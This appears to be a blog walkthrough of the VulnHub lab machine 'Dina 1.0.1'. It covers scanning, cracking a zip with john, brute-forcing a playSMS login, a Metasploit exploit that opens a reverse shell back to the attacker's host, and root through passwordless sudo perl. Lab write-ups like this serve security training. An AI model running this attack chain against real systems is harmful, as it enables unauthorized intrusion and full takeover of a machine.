medium.com

Dina: 1.0.1 [VulnHub] — Walkthrough

Anu Shibin Joseph Raj
3–4 minutes

As always, I’m starting with the netdiscover tool to find the IP of the remote machine:

root@kali:~# netdiscover

Press enter or click to view image in full size

Finding the IP of the remote machine using the netdiscover tool
Finding the IP of the remote machine using the netdiscover tool

Now let’s see the services running on the box with the help of the nmap tool by performing an aggressive scan on all the ports of the remote machine:

root@kali:~# nmap -p- -A 192.168.0.15

Press enter or click to view image in full size

Finding exposed services on the remote machine using the nmap tool
Finding exposed services on the remote machine using the nmap tool

There is only an HTTP service running at port 80. Let’s check what inside it.

HTTP (80):

The HTML landing page didn’t give much information other than what Dina meant.

http://192.168.0.15/

Next thing I looked into was the robots.txt file:

http://192.168.0.15/robots.txt
Content of the robots.txt file
Content of the robots.txt file

That’s a lot of directories! I checked each of them one by one and found some passwords in the page source of one of them!

http://192.168.0.15/nothing/
Passwords found in one of the files mentioned in the robots.txt file
Passwords found in one of the files mentioned in the robots.txt file

Then I checked elsewhere inside the webpage but couldn’t find anything else. So I moved on to run a gobuster directory scan.

root@kali:~# gobuster dir -u http://192.168.0.15/ -w /usr/share/wordlists/dirb/big.txt

Press enter or click to view image in full size

gobuster directory scan results
gobuster directory scan results

The gobuster scan result had one extra folder, called “secure”, which was not present in the robots.txt file.

Get Anu Shibin Joseph Raj’s stories in your inbox

Join Medium for free to get updates from this writer.

There was a zip archive inside this folder. But it was password protected. So I used the zip2john tool to extract the password hash first. Then I used the john tool along with the passwords that we gathered from the webpage to crack the hash. This is how I did it:

root@kali:~# zip2john backup.zip > ziphash.txt
root@kali:~# cat ziphash.txt
root@kali:~# cat pass.txt
root@kali:~# john --wordlist=pass.txt ziphash.txt

Yay! We got the password! On extracting the ZIP and reading the content of the file inside, we get another directory name which is present on the HTTP server.

Press enter or click to view image in full size

Content of the ZIP archive
Content of the ZIP archive

I headed to that webpage and got a login page. After brute-forcing all the passwords that we have, I got the correct one:

Username: touhid

Password: diana

There was a playSMS application deployed in it. So I checked in Metasploit if there were any exploits available for it. And there was one! So I used it to get a reverse shell.

root@kali:~# msfdb start
root@kali:~# msfconsole -qmsf5 > search playsms
msf5 > use exploit/multi/http/playsms_filename_exec
msf5 > set RHOSTS 192.168.0.15
msf5 > set RPORT 80
msf5 > set TARGETURI /SecreTSMSgatwayLogin
msf5 > set USERNAME touhid
msf5 > set PASSWORD diana
msf5 > set LHOST 192.168.0.14
msf5 > exploit

Yay! We’re in 😃

Privilege escalation was even easier since perl had sudo execution rights with no password 😁

python -c 'import pty; pty.spawn("/bin/bash");'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo /usr/bin/perl -e 'exec "/bin/bash";'
root@Dina:/var/www/SecreTSMSgatwayLogin# cd /root
root@Dina:~# cat flag.txt

Press enter or click to view image in full size

Hooray! 💃

The End 😄